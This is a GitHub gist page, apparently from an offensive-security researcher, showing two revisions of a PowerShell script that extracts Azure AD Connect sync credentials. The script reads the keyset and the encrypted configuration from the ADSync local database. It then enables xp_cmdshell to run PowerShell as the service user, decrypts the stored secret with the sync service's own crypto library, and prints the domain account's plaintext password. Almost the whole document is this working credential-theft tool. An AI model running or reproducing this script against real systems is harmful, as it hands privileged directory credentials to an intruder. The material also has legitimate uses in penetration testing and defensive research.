Last active
July 30, 2025 13:07
-
-
Save xpn/f12b145dba16c2eebdd1c6829267b90c to your computer and use it in GitHub Desktop.
Revisions
-
xpn revised this gist
Sep 2, 2024 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,7 +1,7 @@ Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)" Write-Host "`t[ Updated to support new cryptokey storage method ]`n" $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync" try { $client.Open() -
Apr 11, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,67 @@ Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)" Write-Host "`t[ Updated to support new cryptokey storage method ]`n" $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync" try { $client.Open() } catch { Write-Host "[!] Could not connect to localdb..." return } Write-Host "[*] Querying ADSync localdb (mms_server_configuration)" $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration" $reader = $cmd.ExecuteReader() if ($reader.Read() -ne $true) { Write-Host "[!] Error querying mms_server_configuration" return } $key_id = $reader.GetInt32(0) $instance_id = $reader.GetGuid(1) $entropy = $reader.GetGuid(2) $reader.Close() Write-Host "[*] Querying ADSync localdb (mms_management_agent)" $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'" $reader = $cmd.ExecuteReader() if ($reader.Read() -ne $true) { Write-Host "[!] Error querying mms_management_agent" return } $config = $reader.GetString(0) $crypted = $reader.GetString(1) $reader.Close() Write-Host "[*] Using xp_cmdshell to run some Powershell as the service user" $cmd = $client.CreateCommand() $cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'" $reader = $cmd.ExecuteReader() $decrypted = [string]::Empty while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) { $decrypted += $reader.GetString(0) } if ($decrypted -eq [string]::Empty) { Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell" return } $domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}} $username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}} $password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}} Write-Host "[*] Credentials incoming...`n" Write-Host "Domain: $($domain.Domain)" Write-Host "Username: $($username.Username)" Write-Host "Password: $($password.Password)"